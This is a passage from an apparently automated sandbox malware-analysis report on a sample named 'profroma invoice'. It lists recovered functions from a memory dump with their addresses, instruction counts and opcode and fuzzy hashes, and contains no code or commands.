                                                          Function 017247FB Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b713225cce3b36166a67f29661c01a6463536d824bb117df9ec089f94ba9bb6d
                                                          • Instruction ID: 69af19dcc3c832c7e75f1326987f27308af3d58539aa3f38e5f995b16e3b9369
                                                          • Opcode Fuzzy Hash: b713225cce3b36166a67f29661c01a6463536d824bb117df9ec089f94ba9bb6d
                                                          • Instruction Fuzzy Hash: 4DF0B4319B66F19FE732CB5CC444B62FFD49B01660F09496AD94B87502C7B4D882C651
                                                          Function 017E0115 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15bc2e398fd4842e1f252265db9421ee2619e26a4e23d8570221692bdbe0569d
                                                          • Instruction ID: b38b66196ac84168723303fc9d2600c9266cace9f2a7f51f525bcbe381e8fef4
                                                          • Opcode Fuzzy Hash: 15bc2e398fd4842e1f252265db9421ee2619e26a4e23d8570221692bdbe0569d
                                                          • Instruction Fuzzy Hash: F7F027A751668507CF325B2C745C3D9FBFAA74A110F2A1489E8E55F209D5F4CA83C720
                                                          Function 0175C5ED Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 34149453423321291395e97f7fd3819a3172f725e32b460b5e1285cbc3092280
                                                          • Instruction ID: e3836e81eb4ad8f4b3ddfb68caa721ebc21f057a8c64aeeb7d9e4806cb52fad0
                                                          • Opcode Fuzzy Hash: 34149453423321291395e97f7fd3819a3172f725e32b460b5e1285cbc3092280
                                                          • Instruction Fuzzy Hash: E7F052754013458FE3A3CB1CC008B12FBDCDB00BA0F089465CD0283102C2F0EA80CAB1
                                                          Function 01762619 Relevance: .0, Instructions: 31COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                          • Instruction ID: 7e3263d9453a14a363c5473b0b566d16ccc8bbe6115ac88821c1d9dc771031dc
                                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                          • Instruction Fuzzy Hash: BBE0D8323406012BE7119E598CC4F47B76EDFD6B10F040079BA046F256C9E2DC0983A4
                                                          Function 017B6030 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                          • Instruction ID: 1ffcc90f6d9c61fa8edd1dc793de7eee5e53c147195da2c9bce64abc594b2b4d
                                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                          • Instruction Fuzzy Hash: 46F030721442049FE3218F0AD984FA2F7F8EB45364F45C065F7099B561D379EC40CBA4
                                                          Function 01720710 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                          • Instruction ID: a60a64a99d899e22b1216288f34a7abc795f78f510e8750659c929e2dea12127
                                                          • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                          • Instruction Fuzzy Hash: 26F0ED7A2047599BEF16CF19D040AA9FBA8FB41360F0000D4F8428B312EB31E982CBA0
                                                          Function 017549D0 Relevance: .0, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                          • Instruction ID: 552f34b5ada7150f6e2a44dfebcf9d6d5e01f0ecde9da8496a4823c90d1011ff
                                                          • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                          • Instruction Fuzzy Hash: 84E0D832244145ABD3E15B698808B66F7A5EBD47A0F150429EA0A8B150FBF0DDC0C7E8
                                                          Function 017F4164 Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14d873a0cad315b37c7714773860f12b4165bb40ec7a669b5c6aa37f6a411d80
                                                          • Instruction ID: 8295c67d41e19dcaaf613340c6ce68670795bb76842adec8c6cc4c54274ca35d
                                                          • Opcode Fuzzy Hash: 14d873a0cad315b37c7714773860f12b4165bb40ec7a669b5c6aa37f6a411d80
                                                          • Instruction Fuzzy Hash: 9AF02B31A255918FE772D72CD944F53F7E1AF10630F0A055CD50287B12C320DC40C650
                                                          Function 017C678E Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                          • Instruction ID: dfd35df86792d67f96201709e3282fa6d8929ec0d4ff85dc2ef36d452057e85e
                                                          • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                          • Instruction Fuzzy Hash: A1E0DF32A40210BBDB2197998D05F9AFEACDF94FA0F050058BA01EB194E570DE00D690
                                                          Function 017F08C0 Relevance: .0, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                          • Instruction ID: be1e45946513e199d0f8cc9cb11467fc55fc02cba93d49086b4e9e2111cfe09d
                                                          • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                          • Instruction Fuzzy Hash: 14E09B316803508FCB258A1DC140A53F7EDDFB5661F1580ADEA1547713C231F842D6D0
                                                          Function 017225E0 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 77b374d3576fc3f264ade51420b88eca07fe438d6f3f2890f66dee28470c84bd
                                                          • Instruction ID: 83e8d3dac7a5e5fe886ecfa84686662fae01c8a8d531eb4486a056f8794bd155
                                                          • Opcode Fuzzy Hash: 77b374d3576fc3f264ade51420b88eca07fe438d6f3f2890f66dee28470c84bd
                                                          • Instruction Fuzzy Hash: 08E092321005549BC321BB29DD05F8AB79AEFA0360F114515F15657195CB34A911C788
                                                          Function 017DA456 Relevance: .0, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                          • Instruction ID: e7f0eac7b307b08fe0503c1808118323dcb05bc12d6c18ac38c2e8dfb0195ed1
                                                          • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                          • Instruction Fuzzy Hash: D9E01231010651DFE7366F2AD94CB52FBF5FF50711F188C2DA19A125B5CBB598C1DA40
                                                          Function 017A4000 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                          • Instruction ID: 2aae1185f700419f3df1cbee61f3558dcaf5011d4f00b1b1e35f1e5636555c3e
                                                          • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                          • Instruction Fuzzy Hash: 65E0C2343403058FE715CF19C040B63BBB6BFD5A10F68C1A8A9498F205EB73E842DB40
                                                          Function 0175CA38 Relevance: .0, Instructions: 22COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fa3257983272d7532ff096f1130c59d343505b1b55c471658987ac0ef5fbefad
                                                          • Instruction ID: e4ac01a864fbf92128efd6e28bd6dac35e89403afe83c4868f1576264501d28f
                                                          • Opcode Fuzzy Hash: fa3257983272d7532ff096f1130c59d343505b1b55c471658987ac0ef5fbefad
                                                          • Instruction Fuzzy Hash: 32D02B328C51706ACFB7E1187C08FD3BF5D9B44220F014870FA0896015E5B4CD8186D4
                                                          Function 0171823B Relevance: .0, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                          • Instruction ID: 23e93a4554dba31c8fc5995ce1f040ea4c4eff5cd27c866a996a35f405894a57
                                                          • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                          • Instruction Fuzzy Hash: 07E0C231008A10EFDB332F19DC08F91F6A5FF94B10F244869E485160AD8774AC81CB45
                                                          Function 01722050 Relevance: .0, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 70206bc5a5272c898c3a9705768fca4f0b882c64796c4b67c37ee06081f4e2aa
                                                          • Instruction ID: 008354cf0a3a039c0be97cf1249bd8f9cd0f87f891040edbaa3794bc5700ad0d
                                                          • Opcode Fuzzy Hash: 70206bc5a5272c898c3a9705768fca4f0b882c64796c4b67c37ee06081f4e2aa
                                                          • Instruction Fuzzy Hash: BBE0C2332004606BC321FB5DDD00F4AB39EEFA4360F110221F191876D8CB64ED01C794
                                                          Function 01776AA4 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                          • Instruction ID: 04f4c44b810308be24a567837cef6f6203588fd3da89ba6471c1b997c78958b6
                                                          • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                          • Instruction Fuzzy Hash: 73D05E36511A50AFD7329F1BEA04C13FBF9FBC4A107060A2EA54583A24C670AC06CBA0
                                                          Function 0175E59C Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                          • Instruction ID: 2f49f86a4fa9eb01d2fe9e437a6a698ecaf946a8f554130fc7ebbeaaf1766236
                                                          • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                          • Instruction Fuzzy Hash: 99D0A7321045105BD7329A1CFC04FC373D8BB88720F050459B014C7051C364AC41C644
                                                          Function 0179E908 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                          • Instruction ID: bedca41c6b970f819cfdf0e0a0088ef1d9dc70f7c8e305f2a3622cfb693376fa
                                                          • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                          • Instruction Fuzzy Hash: 81E08C319406809BCF22DF59D644F4AFBB4BB84B00F150004E0085B264CA24A800CB40
                                                          Function 0171A0E3 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                          • Instruction ID: f42f154460297f27a3fa4f1e6794ea2db0c3414b807f70de5aca607e8d022ac0
                                                          • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                          • Instruction Fuzzy Hash: 2DD022322130B193CB2856596904F63E915ABC0A90F1A006C340A93808C0088C42D2E0
                                                          Function 0175A830 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                          • Instruction ID: 93a2ca660342b80205369f485a473ba640649d0bdd486155343277519afaaee6
                                                          • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                          • Instruction Fuzzy Hash: 4DD012371D054DBBCB219F66DC01F957BA9E7A4BA0F444420B514875A1C63AE950D584
                                                          Function 0175CA24 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9ca84bdc7ce9619f4a55d0dd5ef698cf07ce9e8de6a87aa844ddab0203b9a8f7
                                                          • Instruction ID: 35699baf5041f521e87f2e440c011da16d1bf4ebad1990aad3838bfa3e11d843
                                                          • Opcode Fuzzy Hash: 9ca84bdc7ce9619f4a55d0dd5ef698cf07ce9e8de6a87aa844ddab0203b9a8f7
                                                          • Instruction Fuzzy Hash: E7D0A731501109CBDF27CF08C510E2EFA78FF20A41F50006CEB0051030E378ED01CA00
                                                          Function 017302A0 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                          • Instruction ID: 6c3991655045e4bce9ee4161ec9900442ba4524de228c90053e02e52355a2483
                                                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                          • Instruction Fuzzy Hash: F5D0C935256E80CFD61BCB0CC5A4F15B3A8BB84B44F8104D0F402CBB22D66CD940CA00
                                                          Function 0175C700 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                          • Instruction ID: 0e32b51943ece1c2e8244a01b90d73fcaf6bc13fe0cf665c3abf4282aea1fbb9
                                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                          • Instruction Fuzzy Hash: 94C01232150644AFC7119A95CD01F0177A9E798B40F000421F20447571C535E810D644
                                                          Function 01740310 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                          • Instruction ID: c040c1c995ea8c74d2756d216bfd520b6850d84bf7bb8be5e1f410fa7d5b39c2
                                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                          • Instruction Fuzzy Hash: 4BD01236100248EFCB01DF41C890D9ABB2AFBD8710F108019FD19076108A31ED62DA50
                                                          Function 01720750 Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                          • Instruction ID: e11e849fc49f1ea090c857721c97b72101e0f2bde606ff22fae08da391387c4a
                                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                          • Instruction Fuzzy Hash: 6DC04C797115458FCF15DB19D298F45B7E4F744750F1508D0E805CB722E624E841CA10
                                                          Function 01764340 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 29405e3384a7753a84af1dabeb16da14ba0d74455aafed1850786b6f6e45e4f8
                                                          • Instruction ID: 151623b109fa8e559b6715744bb265f27a38d42bff7df8fc593afbf0e4c60735
                                                          • Opcode Fuzzy Hash: 29405e3384a7753a84af1dabeb16da14ba0d74455aafed1850786b6f6e45e4f8
                                                          • Instruction Fuzzy Hash: F8900231609900129640715888885468005A7E0301F56C031E0424564CCA148B565362
                                                          Function 01764650 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7eb62cf5dd73879dc9a40d521104e503e33ec8ada295cb34fb69a4d114e31b08
                                                          • Instruction ID: d3212ac0034a23b53360300ce51f5e44225d8bf62cc46839888b3f953eb4d329
                                                          • Opcode Fuzzy Hash: 7eb62cf5dd73879dc9a40d521104e503e33ec8ada295cb34fb69a4d114e31b08
                                                          • Instruction Fuzzy Hash: 9A90026160560042464071588808406A005A7E1301796C135A0554570CC6188A55936A
                                                          Function 01762BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 307f54e14c0a11529613c0adb7111d100e86a3f3acaebeaf713f840171b7bd9a
                                                          • Instruction ID: ba0227ef09325f0c1c79577f04145f88b630df89539712e1318c10468169fc13
                                                          • Opcode Fuzzy Hash: 307f54e14c0a11529613c0adb7111d100e86a3f3acaebeaf713f840171b7bd9a
                                                          • Instruction Fuzzy Hash: 7490023120550802D6807158840864A400597D1301F96C035A0025664DCA158B5977A2
                                                          Function 01762BE0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ceb4971e21628a8e668e6e36dcdadbf680cabff2ae5f6e7d7b8e82df15f543b4
                                                          • Instruction ID: 3c2aacf0cd395cd03a4af7e9b45b3b430fa098cd9380c7b7f42c0b91a8ce04c6
                                                          • Opcode Fuzzy Hash: ceb4971e21628a8e668e6e36dcdadbf680cabff2ae5f6e7d7b8e82df15f543b4
                                                          • Instruction Fuzzy Hash: 0090023120954842D64071588408A46401597D0305F56C031A00646A4DD6258F55B762
                                                          Function 01762BA0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6fb5b4764b72a050a8247120bd175e9cd57cf08ed0f3e3399c90f9a76a870fc4
                                                          • Instruction ID: 0715c8951cf3d83ece13f569c07865cf7debaee774d1d52b7b7e51d49cd6ffa3
                                                          • Opcode Fuzzy Hash: 6fb5b4764b72a050a8247120bd175e9cd57cf08ed0f3e3399c90f9a76a870fc4
                                                          • Instruction Fuzzy Hash: 7B90023160950802D65071588418746400597D0301F56C031A0024664DC7558B5577A2
                                                          Function 01762B80 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2809137029.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_16f0000_profroma invoice.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 14b006a843e67b9d31218cccbeef6c2565cef0a6aa76de87324b4ced519f21e8
                                                          • Instruction ID: 01cc52ba4426bd97b257de4e048b0990d000cc8fa79a75e4694c56b58a59a67d
                                                          • Opcode Fuzzy Hash: 14b006a843e67b9d31218cccbeef6c2565cef0a6aa76de87324b4ced519f21e8
                                                          • Instruction Fuzzy Hash: CB90023120550802D60471588808686400597D0301F56C031A6024665ED6658A917232
                                                          Function 01762AF0 Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
